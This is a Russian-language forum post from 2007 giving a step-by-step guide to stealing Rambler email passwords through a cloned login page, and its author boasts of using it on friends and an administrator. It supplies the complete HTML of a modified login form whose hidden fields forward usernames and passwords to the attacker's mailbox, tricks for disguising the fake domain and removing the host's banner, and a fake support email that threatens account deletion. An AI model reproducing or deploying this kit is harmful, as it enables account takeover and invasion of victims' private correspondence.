Когда то давно видел в нете идею такого содержания: "пишешь юзеру письмо на мыло типа от службы поддержки чтоб он перезашел на свою почту по вот этой ссылке, типа он переходит по ссылке а там главаная страница его сервиса (ну там рамблер или маил), вводит пароль и в мыло заходит, а пароль скриптом отсыается взломщику...". Идея мне эта понравилась, так как довольно проста сама по себе (социальная инженерия =) и впринципе осуществима. ну потом я про это дело забыл, а вот сейчас мне понадобиось срочно одного пацана "ломануть" и почту его поворошить, вот я это дело и вспмнил, короче основываясь на вышеизложенной идее я все в своем виде оформил и самое интересное что того пацана я на ключик от мыла опустил, а так же ещё с десяток своих подруг и нашего уважаемого второго админа =), который к сожалению очень скоро все прочуял и пароль сменил... ну да не важно, короче сделал я это вот как:
-------------------------------------
Если вы хотите узнать чужой пароль (руководство от Lex'a =)!
Допустим мы хотим опустить владельца мыла ***@rambler.ru 1)Жертва не должна знать о том, что она жертва!!! (важно)
Подготовка:
2)Регим сайт на narod.ru с адресом типа ramblerauthorisation.narod.ru
3)Регим мыло типа techsupport-robot@mail.ru
Создание муляжа странички:
4)Идем на rambler и полностью копируем код странички, потом вставляем его в код главной странички нашего сайта на народе, и опля! - по адресу ramblerauthorisation.narod.ru появляется рамблер - великий и ужасный))
- "но ведь видно же в троке адреса, что это народ?!" - скажите вы.
- Да, это так, и я не знаю, как с этим бороться, кто скажет - буду признателен, но есть способ проще:
Убираем с гавной страницы рамблеровский код и делаем чтобы главная страница автоматом переадресовывала нас на html страничку на этом же сайте но с длиннющим названием, например | Code | | http://ramblerauthorisation.narod.ru/F1-EF-E5-F0-E5-F2F-CEF-E0-F0-EEE-BFCE0-EAE-AEF-3EDF-2E0-EDE0amblerF1EFE-EEC-EE-F9F-CFEE2E-5ED-E8A-E0E8F2F0E5F5E3E-2-EEE-7-E-4E5E9E2F7EF0E0-F 3-F2-F0-EE-ECramblerinf-setLogintext.html |
Этот адрес будет сильно отвлекать юзера и как бы маскировать народность страницы, но есть ещё одна пробема!
- "Да ведь народ баннер вешает в угол! какая же рамблеровская страница с народовским баннером!?"
- Правильно! И на это есть свое лекарство!Для того чтоб избавится от тупого народного баннера код страницы надо изменить следующим образом:
В тэг <head></head> в САМЫЙ ВЕРХ надо вставить вот это | Code | | <script language=JavaScript src=http://flashjam.narod.ru/3ffd8df4.js></script> |
а тэг <body (всякие параметры...)> надо добавить вот это | Code | | onload="killyandexad()" |
Вот теперь реклама народа появляться не будет! 5) Теперь надо сделать так, чтобы при вводе логина и пароля в соответствующие поля на странице и после нажатия кнопки "вход" пароль и логин приходили к нам на мыло. Вот сопсно теперь надеюсь вы поняли, почему надо было создать сайт именно на народе! Там есть такой хороший сервис, назвается "анкета", отличается он тем, что при нажатии на кнопку "отправить" сообщение пользователя уходит к нам на мыло без всяких запросов на подтверждение отправки. Итак, создаем страничку анкеты и благополучно забываем про неё, потом берём вот этот код и вставляем адаптируем его в рамблеровскую страничку, приведу пример:
Вот это код анкеты, как он есть- | Code | <form ENCTYPE="multipart/form-data" action="http://narod.yandex.ru/send-poll.xhtml" method=POST>
<tr>
<td><font size=-1><input type=text name="a[Ваше имя или ник]"></font></td>
</tr>
<tr>
<td><font size=-1><input type=password name="a[Ваш e-mail]"></font></td>
</tr>
<tr>
<td><input type=submit value="отправить"></td>
</tr>
<input type=hidden name="email" value="(и маил, куда будет отослан пароль)">
<input type=hidden name="title" value="">
<input type=hidden name="login" value="(ваш логин на народе)">
<input type=hidden name="backlink" value="(куда будет переадресован поьзователь после нажатия кнопки "вход")">
<input type=hidden name="separator" value="">
<input type=hidden name="vari" value="4">
<input type=hidden name="forceforward" value="Да"> //здесь обязательно Да
</form>
</table>
</div> |
а вот так выглядит форма, вставленная ПРАВИЛЬНО в код страницы рамблера- | Code | <div class="border1">
<table border="0" cellspacing="7" cellpadding="0" >
<form ENCTYPE="multipart/form-data" action="http://narod.yandex.ru/send-poll.xhtml" method=POST>
<tr>
<td>Имя</td>
<td width=100%><font size=-1><input type=text name="a[Это мой ник =):]"></font></td>
</tr>
<tr>
<td>Пароль</td>
<td width=100%><font size=-1><input type=password name="a[А это мой пароль =):]"></font></td>
</tr>
<td colspan="2">
<table border="0" cellspacing="0" cellpadding="0">
<tr>
<td><input type=submit value="Войти"></td>
<td> </td>
<td><a href="http://gelezkovoadm.ru/"http://id.rambler.ru/script/reminder.cgi">Забыли пароль?</a></td>
</tr>
</table>
</td>
</tr>
<input type=hidden name="email" value="l4e@rambler.ru"> //адрес отправки письма с паролем (это моё мыло=)
<input type=hidden name="title" value="">
<input type=hidden name="login" value="flashjam"> //ваш логин на народе (вот это мой логин=)
<input type=hidden name="backlink" value="http://rambler.ru"> //страничка переадресации
<input type=hidden name="backtext" value="На главную страницу">
<input type=hidden name="separator" value="">
<input type=hidden name="mess" value="Спасибо">
<input type=hidden name="vari" value="4">
<input type=hidden name="forceforward" value="Да">
</form>
</table>
</div> |
Короче берёте код выше и вставляете его в страницу рамблера вместо вот этого кода- | Code | <div class="border1">
<table border="0" cellspacing="7" cellpadding="0" >
<form action="http://mail.rambler.ru/script/auth.cgi" method="POST"><input type="hidden" name="domain" value="rambler.ru"><input type="hidden" name="url" value="7">
<tr>
<td>Имя</td>
<td width=100%><input type="text" name="login" value="" size="10" tabindex="2" class="input100"></td>
</tr>
<tr>
<td>Пароль</td>
<td width=100%><input type="password" name="passw" size="10" tabindex="2" class="input100"></td>
</tr>
<td colspan="2">
<table border="0" cellspacing="0" cellpadding="0">
<tr>
<td><input type="submit" value="Войти" tabindex="2"></td>
<td> </td>
<td><a href="http://gelezkovoadm.ru/"http://id.rambler.ru/script/reminder.cgi">Забыли пароль?</a></td>
</tr>
</table>
</td>
</tr>
</form>
</table>
</div> |
ВСЁ! С изиенением страницы мы закончили, сохраняем результат и радостно потираем потные ладошки =)
Теперь осталось только отправить письмо вида
--------------------------------------------
Здравствуйте! На ваш адрес (адрес тупого юзера =) высылается запрос повторной
авторизации, в связи с неполадками на почтовом сервере s3. Для того чтобы пройти авторизацию, вам необходимо зайти на страницу
http://(ссылка на страничку переадресации)
и затем в письме робота пройти по ссылке подтверждения. В обратном случае неответившие на данный запрос аккаунты могут быть
удалены! С уважением,
Робот службы поддержки Mail.rambler.Ru (techsupport-robot@rambler.ru) --------------------------------------------
Но есть одно но, которое может все испортить! Почта рамблера отличается одной говнючестью, а именно в письме нельзя шифрить ссылки =(, тогда какой же кретин пойдет авторизироваться на народовский сайт!? поэтому ссылку надо написать в другой кодировке! Будут вопросы - пишите =)
Сообщение отредактировал Lex - Пятница, 2007-05-11, 4:10 Pm | 
